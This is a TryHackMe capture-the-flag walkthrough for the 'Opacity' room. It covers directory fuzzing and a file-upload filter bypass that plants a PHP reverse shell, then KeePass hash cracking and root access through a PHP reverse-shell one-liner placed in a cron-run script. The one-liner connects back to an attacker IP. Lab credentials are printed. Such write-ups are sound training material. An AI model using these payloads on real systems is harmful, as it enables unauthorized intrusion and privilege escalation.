Opacity Room: A TryHackMe 101 Walkthrough
Introduction:
Hey there, cyber explorers! Get pumped for a cool adventure in the Opacity Room on Try Hack Me. It’s set at an Easy difficulty level, so it’s just the right amount of challenge for anyone looking to boost their skills. Let’s dive in and have some fun!
Tools Used:
The Opacity room utilizes five essential tools for penetration testing:
- Nmap: A powerful network scanning tool that helps identify open ports, services, and vulnerabilities on a target machine.
- FFUF: A powerful open-source web fuzzing tool designed to rapidly discover hidden files and directories on web servers through customizable wordlists and filtering options.
- Netcat: A versatile utility for TCP/UDP data transfer, vital for tasks like port scanning, banner grabbing, and network troubleshooting in penetration testing and management.
- pspy64: A silent detective for computers, it quietly reports on what’s happening behind the scenes.
- John the Ripper: A digital locksmith for passwords, it’s like a master key used by ethical hackers and security pros to crack passwords and assess system security.
Our Goal:
Our goal in Opacity is to learn penetration testing with this beginner-friendly machine. Within it, we must locate two hash keys (user — local.txt and root — proof.txt) and use them to gain root access. Remember that there are multiple ways to achieve our objective, so let’s analyze the application’s behavior to find the best approach.
Step 1: Connecting With TryHackMe VPN
Before starting, ensure your Try Hack Me VPN is connected and working. If you need assistance with a VPN connection, refer to this article.
Step 2: Launch the Machine
Start the machine provided in the room and let it run for 3–4 minutes before proceeding, a box will appear like below indicating that the machine is working and you will have the IP Address of the newly deployed machine.
Step 3: Ping the Machine
Ensure the machine is responsive by pinging it using the terminal of your Kali Linux machine.
Use the command: ping <Machine_IP>.
example:-
ping 10.10.159.222If successful, proceed to the next step.
Step 4: Port Scanning with Nmap
Perform a thorough port scan using Nmap with the command: nmap -sV -p- -v <Machine_IP>.
example:-
nmap -sV -p- -v 10.10.159.222Be patient, this may take some time. The flags are used to serve specific purposes
for example:
-v: Increase verbosity.-sV: Service version detection.-p-: Scan all ports.
Step 5: Analyzing Open Ports
As we can now see the open ports and services. Focus on port 80 as it seems exploitable and the service running on it is HTTP. However, port 22 is also open with SSH, but without credentials, our focus shifts to port 80.
Step 6: Accessing The Website
Access the web interface of port 80 in your browser using the URL format http://<Machine_IP>:80.
example:-
http://10.10.159.222:80Step 7: Directory Busting with ffuf
In this step, we will conduct directory busting on the website using the ffuf tool. The chosen medium wordlist for directory busting is used with the following command:
ffuf -u http://10.10.159.222/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -cBe patient, this may take some time. The flags are used to serve specific purposes
for example:
-u http://10.10.159.222/FUZZ: Target URL for directory busting, using "FUZZ" as a placeholder for items from the wordlist.-w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt: Wordlist file path for directory busting.-c: Colorized Output, makes it easier to understand the output.
The outcomes of this directory busting will be analyzed in the subsequent steps.
Step 8: Analyzing ffuf Output
Upon executing the ffuf directory busting command, carefully examine the output to identify any discovered directories or files. We discovered a directory named "cloud." To explore further, we use it as an endpoint in the URL.
Inside the directory, we encounter a webpage prompting file uploads through external links, with a catch — only files with a PNG extension are allowed. To seize this opportunity, we plan to exploit this restriction by crafting and uploading a file with a PNG extension and embedding a reverse shell script within. Stay tuned as we delve into the details in the upcoming steps.
Step 9: Obtaining a Reverse Shell from the Website
Given the ability to upload files via an external link to the website, a reverse shell can be obtained using the Pentestmonkey reverse shell PHP script. Download the script from this link.
Before uploading the PHP script, make the necessary modifications by adding your IP address in the designated section (//Change This) within the script. Specify your IP, such as the Tryhackme VPN IP, and set the port to 1234.
In a new terminal, start a listener by executing the following Netcat command:
nc -nvlp 1234
To upload our reverse shell script as an external link, we kick off a Python3 server on our local machine using the command:
python3 -m http.server 8000With our server up and running, we can proceed to upload the file to the website with the following command:
http://10.10.159.222:8000/php-reverse-shell.php#.pngThe use of ‘#’ in the command incorporates a null byte, aiding us in bypassing the website’s .png file restriction.
Now, we patiently await the completion of the upload process. Once it’s done, we’ll gain a reverse shell. In the upcoming steps, we’ll make this shell interactive and navigate towards locating the local.txt flag.
Step 10: Making the Shell Interactive
To make the shell interactive for improved navigation, execute the following commands sequentially:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm
stty raw -echoThese commands facilitate the transition to an interactive shell environment. Once these commands are executed, the shell becomes interactive. With an interactive shell, you can navigate through the system more efficiently. In the upcoming step, we will proceed to explore the machine further and locate the second key flag.
Step 11: Navigating The System
Now that we’ve made our shell interactive, navigating the machine becomes more manageable. To locate the local.txt flag, we head to the home/sysadmin directory and attempt to view the contents of the local.txt file. Unfortunately, we encounter a “permission denied” error, signaling insufficient privileges.
To overcome this hurdle, we plan to switch our user context to sysadmin. However, we need the sysadmin’s password for this. During our system exploration, we uncovered a file named dataset.kbdx. To retrieve this file, we set up a Python3 server on the victim’s system using the command:
python3 -m http.server 9001To download the file, we access the path in our browser, for example, http://10.10.159.222:9001, and navigate to the /opt path. Here, we can click on dataset.kbdx to initiate the download process. Stay tuned for the subsequent steps where we leverage this file to advance further.
Bonus Tip:
The password for the website can be found in a file named login.php located at /var/www/html on the system.
Feel free to explore the website, but you won’t find any useful information there.
Step 12: Cracking the dataset.kbdx File
Wondering what a .kbdx file is? It’s associated with KeePass, a free and open-source password manager. KeePass stores passwords in a local database file, and opening it with the KeePass program requires the main password. Here’s where the vulnerability lies — by extracting the main password hash from the file, we can use brute force to crack it. Once successful, we can open the database and access all stored passwords.
Once we have the dataset.kbdx file on our system, the first step is to convert it into a hash file using the command:
keepass2john Database.kdbx > Keepasshash.txtNow, armed with the hash, we can proceed to crack it using the John the Ripper tool and the rockyou.txt wordlist with the following command:
john --wordlist=/usr/share/wordlists/rockyou.txt Keepasshash.txtUpon successfully cracking the hash, we obtain the main password: 741852963.
With this newfound knowledge, we can open the file in KeePassXC. After accessing the file, we discovered the password for the sysadmin user, which is Cl0udP4ss40p4city#8700.
To install KeePassXC on your system, run the following command:
sudo apt-get -y install keepassxStep 13: SSH with the New User and Obtaining the local.txt Flag
Recall that we discovered an open port 22 for SSH, but lacked the necessary credentials. Now armed with the sysadmin username and password obtained in the previous step, we can proceed to SSH into the system. Execute the following command:
ssh sysadmin@10.10.159.222When prompted, enter the password obtained from the KeePassXC cracking step.
Upon successful login as sysadmin, navigate to the /home/sysadmin directory using the command:
cd /home/sysadminNow, let’s retrieve the local.txt flag by running:
cat local.txtCongratulations! You’ve successfully retrieved the local.txt flag.
Step 14: Privilege Escalation and Retrieving the final Proof.txt Flag
To achieve privilege escalation, we’ll utilize a tool called pspy64. First, download the tool to your local machine.
Since our Python3 server is running on port 8000, you can transfer the file to the victim’s system with the command:
wget 10.17.98.201:8000/pspy64Ensure that the tool has the necessary permissions to run by executing:
chmod +x pspy64Now, run the tool with:
./pspy64Remember to navigate to the /tmp folder on the victim’s machine before executing these commands.
Upon running the tool, observe the cronjob executing a script named script.php every minute.
Further examination reveals that another script, backup.inc.php, is invoked by script.php. We can exploit this by inserting a one-liner reverse shell script into backup.inc.php. The one-liner is:
$sock=fsockopen("10.17.98.201",9001);exec("sh <&3 >&3 2>&3");
As I tried to modify that backup.inc.php it gave a permission error. So I copied that file to the /tmp location and put a reverse shell in it.
Use nano to modify the file, Just copy the reverse shell code and paste it into that script.
Save this file with no changes in its name and move it to its original location. It will ask you for permission “ want to replace this file ? “ you should type “yes” to move that file successfully.
Open a new terminal on your local system and initiate a new Netcat listener:
nc -nvlp 9001
Wait for the connection. Once established, use the whoami command to confirm that you now have root access. Navigate to the root directory with:
cd /rootFinally, retrieve the final Proof.txt flag:
cat proof.txtCongratulations! You’ve successfully escalated privileges and obtained the final Proof.txt flag.
Conclusion:
In conclusion, our journey through the Opacity room on Try Hack Me has been a rewarding exercise in penetration testing. Starting with the creative exploitation of web vulnerabilities, we progressed by obtaining sysadmin credentials and escalating privileges. Key moments included identifying and leveraging a cronjob to gain root access. This hands-on experience equipped us with valuable skills, emphasizing the importance of creativity and persistence in ethical hacking. Opacity served as an excellent platform for practical application, contributing to our growth in the dynamic field of cybersecurity. The acquired insights and skills will undoubtedly prove beneficial in addressing future security challenges.
If you found this article insightful and informative, please consider following for more in-depth explorations and analyses in the realm of cybersecurity. Your support is greatly appreciated!
